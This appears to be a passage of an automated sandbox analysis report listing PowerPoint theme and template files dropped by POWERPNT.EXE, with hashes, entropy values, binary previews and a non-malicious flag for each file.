                                                                                                                              Preview:PK.........V'BE,.{....#P......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`.../.|u1..Y.....nK.......u=..2.tu~^L.Y5]/...~+.v...o....j.`?.S...../.by.|..>."kZbs....H.9..m.z.]W.V.?~v........;...N.......w....;.z..N.......w.....R.~n..Ofu.-..K.e....{..A.~.8.#D..)o.7..........:2........=......f...u....[..}...u.6b...xz.[...G..|#...$....)J./.......7.............oQ..]^.M........wy}7a.....&l................w.......l._...l..?.A..........r..9.|.8.........{w...........n...]^.M........wy}7a.....&l.................`..z..`.....2.o...wx}.....>..c.M..Arr#.....nD..[.....w......n...]^.M........wy}7a.....&l........w........... ..Fp....w_Q....g..tL.i.?H.o...]^..........n...]^.M........wy}7a.....&l.................`..z..`
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):274
                                                                                                                              Entropy (8bit):3.535303979138867
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6:Q+sxnxUX3IlVARELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnynG6ymD0wbnKNAH/lMz1
                                                                                                                              MD5:35AFE8D8724F3E19EB08274906926A0B
                                                                                                                              SHA1:435B528AAF746428A01F375226C5A6A04099DF75
                                                                                                                              SHA-256:97B8B2E246E4DAB15E494D2FB5F8BE3E6361A76C8B406C77902CE4DFF7AC1A35
                                                                                                                              SHA-512:ACF4F124207974CFC46A6F4EA028A38D11B5AF40E55809E5B0F6F5DABA7F6FC994D286026FAC19A0B4E2311D5E9B16B8154F8566ED786E5EF7CDBA8128FD62AF
                                                                                                                              Malicious:false
                                                                                                                              Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .V.i.e.w...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Microsoft OOXML
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):570901
                                                                                                                              Entropy (8bit):7.674434888248144
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6144:D2tTXiO/3GH5SkPQVAqWnGrkFxvay910UUTWZJarUv9TA0g8:kX32H+VWgkFxSgGTmarUv9T
                                                                                                                              MD5:D676DE8877ACEB43EF0ED570A2B30F0E
                                                                                                                              SHA1:6C8922697105CEC7894966C9C5553BEB64744717
                                                                                                                              SHA-256:DF012D101DE808F6CD872DFBB619B16732C23CF4ABC64149B6C3CE49E9EFDA01
                                                                                                                              SHA-512:F40BADA680EA5CA508947290BA73901D78DE79EAA10D01EAEF975B80612D60E75662BDA542E7F71C2BBA5CA9BA46ECAFE208FD6E40C1F929BB5E407B10E89FBD
                                                                                                                              Malicious:false
                                                                                                                              Preview:PK..........1AE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):282
                                                                                                                              Entropy (8bit):3.5459495297497368
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6:Q+sxnxUXvBAuRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnypJymD0wbnKNAH/lMz1
                                                                                                                              MD5:76340C3F8A0BFCEDAB48B08C57D9B559
                                                                                                                              SHA1:E1A6672681AA6F6D525B1D17A15BF4F912C4A69B
                                                                                                                              SHA-256:78FE546321EDB34EBFA1C06F2B6ADE375F3B7C12552AB2A04892A26E121B3ECC
                                                                                                                              SHA-512:49099F040C099A0AED88E7F19338140A65472A0F95ED99DEB5FA87587E792A2D11081D59FD6A83B7EE68C164329806511E4F1B8D673BEC9074B4FF1C09E3435D
                                                                                                                              Malicious:false
                                                                                                                              Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .D.i.v.i.d.e.n.d...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Microsoft OOXML
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):558035
                                                                                                                              Entropy (8bit):7.696653383430889
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12288:DQ/oYjRRRRRRRRYcdY/5ASWYqBMp8xsGGEOzI7vQQwOyP:DQ/nRRRRRRRRxY/5JWYZ3GGbI8YA
                                                                                                                              MD5:3B5E44DDC6AE612E0346C58C2A5390E3
                                                                                                                              SHA1:23BCF3FCB61F80C91D2CFFD8221394B1CB359C87
                                                                                                                              SHA-256:9ED9AD4EB45E664800A4876101CBEE65C232EF478B6DE502A330D7C89C9AE8E2
                                                                                                                              SHA-512:2E63419F272C6E411CA81945E85E08A6E3230A2F601C4D28D6312DB5C31321F94FAFA768B16BC377AE37B154C6869CA387005693A79C5AB1AC45ED73BCCC6479
                                                                                                                              Malicious:false
                                                                                                                              Preview:PK..........1AE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):276
                                                                                                                              Entropy (8bit):3.5361139545278144
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6:Q+sxnxUXeMWMluRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnycMlMymD0wbnKNAH/lMz1
                                                                                                                              MD5:133D126F0DE2CC4B29ECE38194983265
                                                                                                                              SHA1:D8D701298D7949BE6235493925026ED405290D43
                                                                                                                              SHA-256:08485EBF168364D846C6FD55CD9089FE2090D1EE9D1A27C1812E1247B9005E68
                                                                                                                              SHA-512:75D7322BE8A5EF05CAA48B754036A7A6C56399F17B1401F3F501DA5F32B60C1519F2981043A773A31458C3D9E1EF230EC60C9A60CAC6D52FFE16147E2E0A9830
                                                                                                                              Malicious:false
                                                                                                                              Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .B.a.s.i.s...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Microsoft OOXML
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):523048
                                                                                                                              Entropy (8bit):7.715248170753013
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6144:WfmDdN6Zfv8q5rnM6vZ02PtMZRkfW5ipbnMHxVcsOWrCMxy0sD/mcKb4rYEY:xDdQXBrMi2YtggW5ObnMH1brJpUmBU0N
                                                                                                                              MD5:C276F590BB846309A5E30ADC35C502AD
                                                                                                                              SHA1:CA6D9D6902475F0BE500B12B7204DD1864E7DD02
                                                                                                                              SHA-256:782996D93DEBD2AF9B91E7F529767A8CE84ACCC36CD62F24EBB5117228B98F58
                                                                                                                              SHA-512:B85165C769DFE037502E125A04CFACDA7F7CC36184B8D0A54C1F9773666FFCC43A1B13373093F97B380871571788D532DEEA352E8D418E12FD7AAD6ADB75A150
                                                                                                                              Malicious:false
                                                                                                                              Preview:PK..........1AE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):276
                                                                                                                              Entropy (8bit):3.5159096381406645
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6:Q+sxnxUXQIa3ARELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnygIaqymD0wbnKNAH/lMz1
                                                                                                                              MD5:71CCB69AF8DD9821F463270FB8CBB285
                                                                                                                              SHA1:8FED3EB733A74B2A57D72961F0E4CF8BCA42C851
                                                                                                                              SHA-256:8E63D7ABA97DABF9C20D2FAC6EB1665A5D3FDEAB5FA29E4750566424AE6E40B4
                                                                                                                              SHA-512:E62FC5BEAEC98C5FDD010FABDAA8D69237D31CA9A1C73F168B1C3ED90B6A9B95E613DEAD50EB8A5B71A7422942F13D6B5A299EB2353542811F2EF9DA7C3A15DC
                                                                                                                              Malicious:false
                                                                                                                              Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .F.r.a.m.e...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Microsoft OOXML
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):777647
                                                                                                                              Entropy (8bit):7.689662652914981
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6144:B04bNOJMngI856k0wwOGXMaXTLaTDmfBaN2Tx9iSUk1PdSnc0lnDlcGMcEFYYYYt:xbY6ngI46Aw5dmyYYYYYYYYY7p8d
                                                                                                                              MD5:B30D2EF0FC261AECE90B62E9C5597379
                                                                                                                              SHA1:4893C5B9BE04ECBB19EE45FFCE33CA56C7894FE3
                                                                                                                              SHA-256:BB170D6DE4EE8466F56C93DC26E47EE8A229B9C4842EA8DD0D9CCC71BC8E2976
                                                                                                                              SHA-512:2E728408C20C3C23C84A1C22DB28F0943AAA960B4436F8C77570448D5BEA9B8D53D95F7562883FA4F9B282DFE2FD07251EEEFDE5481E49F99B8FEDB66AAAAB68
                                                                                                                              Malicious:false
                                                                                                                              Preview:PK.........V'B.._<....-.......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`.../.|u1..Y.....nK.......u=..2.tu~^L.Y5]/...~+.v...o....j.`?.S...../.by.|..>."kZbs....H.9..m.z.]W.V.?~v........;...N.......w....;.z..N.......w.....R.~n..Ofu.-..K.e....{..A.~.8.#D..)o.7..........:2........=......f...u....[..}...u.6b...xz.[...G..|#...$....)J./.......7.............oQ..]^.M........wy}7a.....&l................w.......l._...l..?.A..........r..9.|.8.........{w...........n...]^.M........wy}7a.....&l.................`..z..`.....2.o...wx}.....>..c.M..Arr#.....nD..[.....w......n...]^.M........wy}7a.....&l........w........... ..Fp....w_Q....g..tL.i.?H.o...]^..........n...]^.M........wy}7a.....&l.................`..z..`
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):290
                                                                                                                              Entropy (8bit):3.5091498509646044
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6:Q+sxnxUX1MiDuRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyFdMymD0wbnKNAH/lMz1
                                                                                                                              MD5:23D59577F4AE6C6D1527A1B8CDB9AB19
                                                                                                                              SHA1:A345D683E54D04CC0105C4BFFCEF8C6617A0093D
                                                                                                                              SHA-256:9ADD2C3912E01C2AC7FAD6737901E4EECBCCE6EC60F8E4D78585469A440E1E2C
                                                                                                                              SHA-512:B85027276B888548ECB8A2FC1DB1574C26FF3FCA7AF1F29CD5074EC3642F9EC62650E7D47462837607E11DCAE879B1F83DF4762CA94667AE70CBF78F8D455346
                                                                                                                              Malicious:false
                                                                                                                              Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .M.e.t.r.o.p.o.l.i.t.a.n...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Microsoft OOXML
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):562113
                                                                                                                              Entropy (8bit):7.67409707491542
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12288:/dy5Gtyp/FZ9QqjdxDfSp424XeavSktiAVE0:/dizp1ndpqpMZnV
                                                                                                                              MD5:4A1657A3872F9A77EC257F41B8F56B3D
                                                                                                                              SHA1:4DDEA85C649A2C1408B5B08A15DEF49BAA608A0B
                                                                                                                              SHA-256:C17103ADE455094E17AC182AD4B4B6A8C942FD3ACB381F9A5E34E3F8B416AE60
                                                                                                                              SHA-512:7A2932639E06D79A5CE1D3C71091890D9E329CA60251E16AE4095E4A06C6428B4F86B7FFFA097BF3EEFA064370A4D51CA3DF8C89EAFA3B1F45384759DEC72922
                                                                                                                              Malicious:false
                                                                                                                              Preview:PK..........1AE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):278
                                                                                                                              Entropy (8bit):3.535736910133401
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6:Q+sxnxUXeAlFkRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyRGymD0wbnKNAH/lMz1
                                                                                                                              MD5:487E25E610F3FC2EEA27AB54324EA8F6
                                                                                                                              SHA1:11C2BB004C5E44503704E9FFEEFA7EA7C2A9305C
                                                                                                                              SHA-256:022EC5077279A8E447B590F7260E1DBFF764DE5F9CDFD4FDEE32C94C66D4A1A2
                                                                                                                              SHA-512:B8DF351E2C0EF101CF91DC02E136A3EE9C1FDB18294BECB13A29D676FBBE791A80A58A18FBDEB953BC21EC54EB7608154D401407C461ABD10ACB94CE8AD0E092
                                                                                                                              Malicious:false
                                                                                                                              Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .B.a.n.d.e.d...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Microsoft OOXML
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):738429
                                                                                                                              Entropy (8bit):7.8235726750504355
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12288:MIA7gJFzMeFZaq2fscBNVRFCToZr5RCmUQHr+kRBhFF0s9XH44qTxQXMI:hA7gJFzZ2xBbmsZdRC4Ck19X44qyMI
                                                                                                                              MD5:8EBD58005DAF9C4EC15AC2530D3A4A30
                                                                                                                              SHA1:D11B9F2B85F20EB3DB28C4D9C9FDD909848E3E05
                                                                                                                              SHA-256:D3AB94FDC32B10903AD444F6F3518F93C3D7348FB945168DD8140C74BB7D7E26
                                                                                                                              SHA-512:00A3A6F8A8D10F4BAD87C3BEAE299D0E28931593EF0FB4145711B1D164A3351A8EF131DA0F26AAB9C3EB7AC214B69E1F03CB52E0E1EA95EB444664D5B0B998E9
                                                                                                                              Malicious:false
                                                                                                                              Preview:PK........e.$A}.4+.....k......[Content_Types].xml..n.@.E_.y.ac $..,........-..g@.u.G.+t.:......A1......=..._..d.....Y:.B...t.e.8]..].....s.M.=.....6...&Z.D.?.u..,."Q.].. W.....p0..Q.Z........Rm7....}\.{.W^.....Z3/N...o.....1'.T.o.HYw?....._,.<<c.qnn...8.:.B9.."^...U.O*q.....>..-]..O...-.q..Y.M...:.M+...}..y..{.0..V'K6.K?Qqz........c^..~GN.*s_..Q=g[k.....8..XCN..'....k.u.u....+..r...!.A....!.Q....a...7U.*uH...!gi=..Y.[.v{&.......q.=.[.v{....k.5.........4Y9..3Y).....v..mi...Wi.~.=G.....t.?.S......bB..H.%X.W..r.>.... .W.\...rU?.++i..&+g.b&+e\..h....r.V..^.JZ..j`........bB..H.%X.W..r.>.... .W.\...rU?.++i..&+g.b&+e\..h....r.V..^.JZ..j`........bB..H.%X.W..r.>.... .W.\...rU?.++i..&+g.b&+e\..h....r.V..^.JZ..j`...[..u...UN -.`A\a..U. .W.\...r5?..U..............q.....,D.%X5Zz.*i.....C.&2.k...UN -.`A\a..U. .W.\...r5?..U..............q.....,D.%X5Zz.*i.....C..d...*&T9..\..q...W.\...r.?.... .W.C...&+h.r&+f.R.%X..K..-.`.h....e.......zu9JR..7..Y=..6.?PK..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):276
                                                                                                                              Entropy (8bit):3.516936518213681
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6:Q+sxnxUXOpCRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyLymD0wbnKNAH/lMz1
                                                                                                                              MD5:B49384CBC2C04035CAFFB84C03499751
                                                                                                                              SHA1:43E0C785D194C56EA45833373095E7C7AE8246DB
                                                                                                                              SHA-256:82CD4A0EF475B600B835565B188702CB4B6CCF0398C13FE27C40C6788396739F
                                                                                                                              SHA-512:34E085D409BF33837A86EDEC219B5C1F8A5AF698CC77D96996DB725464064822C51173828B1C54ED789CD51B5E4CE1EC10A2CB6D62CF1C67211EC4B60023B0C3
                                                                                                                              Malicious:false
                                                                                                                              Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .F.a.c.e.t...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Microsoft OOXML
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):608122
                                                                                                                              Entropy (8bit):7.729143855239127
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6144:Ckl6KRKwg9jf2q/bN69OuGFlC/DUhq68xOcJzGYnTxlLqU8dmTW:8yKwgZ2qY9kA7Uhq68H3ybmq
                                                                                                                              MD5:8BA551EEC497947FC39D1D48EC868B54
                                                                                                                              SHA1:02FA15FDAF0D7E2F5D44CAE5FFAE49E8F91328DF
                                                                                                                              SHA-256:DB2E99B969546E431548EBD58707FC001BBD1A4BDECAD387D194CC9C6D15AC89
                                                                                                                              SHA-512:CC97F9B2C83FF7CAC32AB9A9D46E0ACDE13EECABECD653C88F74E4FC19806BB9498D2F49C4B5581E58E7B0CB95584787EA455E69D99899381B592BEA177D4D4B
                                                                                                                              Malicious:false
                                                                                                                              Preview:PK.........LGE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK.........LG.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):278
                                                                                                                              Entropy (8bit):3.516359852766808
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6:Q+sxnxUXKwRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxny6qymD0wbnKNAH/lMz1
                                                                                                                              MD5:960E28B1E0AB3522A8A8558C02694ECF
                                                                                                                              SHA1:8387E9FD5179A8C811CCB5878BAC305E6A166F93
                                                                                                                              SHA-256:2707FCA8CEC54DF696F19F7BCAD5F0D824A2AC01B73815DE58F3FCF0AAB3F6A0
                                                                                                                              SHA-512:89EA06BA7D18B0B1EA624BBC052F73366522C231BD3B51745B92CF056B445F9D655F9715CBDCD3B2D02596DB4CD189D91E2FE581F2A2AA2F6D814CD3B004950A
                                                                                                                              Malicious:false
                                                                                                                              Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .P.a.r.c.e.l...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):924687
                                                                                                                              Entropy (8bit):7.824849396154325
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12288:lsadD3eLxI8XSh4yDwFw8oWR+6dmw2ZpQDKpazILv7Jzny/ApcWqyOpEZULn:qLxI8XSh4yUF/oWR+mLKpYIr7l3ZQ7n
                                                                                                                              MD5:97EEC245165F2296139EF8D4D43BBB66
                                                                                                                              SHA1:0D91B68CCB6063EB342CFCED4F21A1CE4115C209
                                                                                                                              SHA-256:3C5CF7BDB27592791ADF4E7C5A09DDE4658E10ED8F47845064DB1153BE69487C
                                                                                                                              SHA-512:8594C49CAB6FF8385B1D6E174431DAFB0E947A8D7D3F200E622AE8260C793906E17AA3E6550D4775573858EA1243CCBF7132973CD1CF7A72C3587B9691535FF8
                                                                                                                              Malicious:false
